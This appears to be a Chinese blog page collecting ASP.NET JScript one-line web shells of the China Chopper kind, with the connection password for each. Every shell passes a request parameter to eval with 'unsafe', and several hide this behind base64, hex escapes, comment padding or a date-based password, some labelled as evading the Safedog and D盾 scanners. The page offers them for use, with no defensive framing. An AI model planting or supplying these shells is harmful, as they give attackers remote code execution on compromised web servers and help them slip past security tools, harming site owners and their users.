aspx木马收集:

<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

随日期变化的连接密码, Asp.NET服务端写法:

<%@ Page Language="Jscript"%><%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36", "MD5").ToUpper()],"unsafe");%>

例如:菜刀的密码为chopper,在前面加三个字符,新密码为:{D}chopper

<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>

<script runat="server" language="JScript">
function popup(str) {
var q = "u";
var w = "afe";
var a = q + "ns" + w;
var b= eval(str,a);
return(b);
}
</script>
<%
popup(popup(System.Text.Encoding.GetEncoding(65001).
GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0="))));
%>

密码 z

<%@ Page Language="Jscript" validateRequest="false" %>
<%
var keng
keng = Request.Item["never"];
Response.Write(eval(keng,"unsafe"));
%>

<%@ Page Language = Jscript %>
<%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/
"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+
"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval
(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>

密码 -7

<%@PAGE LANGUAGE=JSCRIPT%>
<%var PAY:String=Request["\x61\x62\x63\x64"];
eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");
%>

密码 abcd

<%@PAGE LANGUAGE=JSCRIPT%>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>

过狗过D盾一句话

<%@ Page Language="Jscript" Debug=true%>
<%
var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
var c=eval(a,b);
eval(c,b);

%>

<%@ Page Language="Jscript" Debug=true%>
<%
var a=Request.Form["pass"];
var b="unsa",c="fe",d=b+c;
function fun()
{
return a;
}
eval(fun(),d);
%>

最新文章

  1. Android(3)—Mono For Android App版本自动更新(2)
  2. wpf 异常处理和关闭进程
  3. NSIS学习记录の----NSIS多语言安装以及详解
  4. Android receiver
  5. 【BZOJ】【3172】【TJOI2013】单词
  6. 关键字 const
  7. 《Effective Java》读书笔记
  8. 高性能、高流量Java Web站点打造的22条建议
  9. python Eve RESTFul 尝试笔记
  10. debug模式启动provider
  11. scala 101
  12. [POJ1088] 滑雪(递归dp)
  13. redis 主从配置实例、注意事项、及备份方式
  14. Java设计模式学习总结
  15. 浅谈c#的三个高级参数ref out 和Params
  16. centos 内存清理
  17. 31:字符串p型编码
  18. 反射调用 java bean的set和get方法
  19. [javaScript]身份证号信息解析
  20. swift 运算符和控制流程

热门文章

  1. android将应用中图片保存到系统相册并显示
  2. 【转】工作中使用Trepn Power Profiler的应用总结
  3. 关于Unity中关节的使用(一)
  4. 第三百三十四节,web爬虫讲解2—Scrapy框架爬虫—Scrapy爬取百度新闻,爬取Ajax动态生成的信息
  5. 转:ios Sqlite数据库增删改查基本操作
  6. e786. 创建JSpinner组件
  7. (实用)Ubuntu 、CentOS更换国内源
  8. Cisco交换机配置VLAN
  9. springboot中@EnableAsync与@Async注解使用
  10. 在Lua中计算含中文的字符串的长度